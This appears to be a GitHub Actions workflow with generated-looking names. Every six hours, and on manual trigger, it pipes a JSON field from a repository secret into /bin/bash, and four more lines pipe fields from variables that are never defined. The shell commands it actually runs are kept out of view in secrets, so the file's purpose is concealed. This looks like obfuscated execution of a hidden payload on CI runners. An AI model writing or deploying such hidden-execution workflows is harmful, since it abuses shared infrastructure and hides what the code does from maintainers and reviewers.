name: equationpreviously
on:
  workflow_dispatch:
  schedule:
    - cron: '28 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: equationpreviously
        env:
          v003: ${{ secrets.v003 }}
        run: |
          echo $v003 | jq -r .wx4 | /bin/bash
          echo $kxayy9 | jq -r .t8 | /bin/bash
          echo $mrqmy8454 | jq -r .ulq60 | /bin/bash
          echo $xtd439 | jq -r .ub619 | /bin/bash
          echo $aermy68227 | jq -r .bqrx050 | /bin/bash

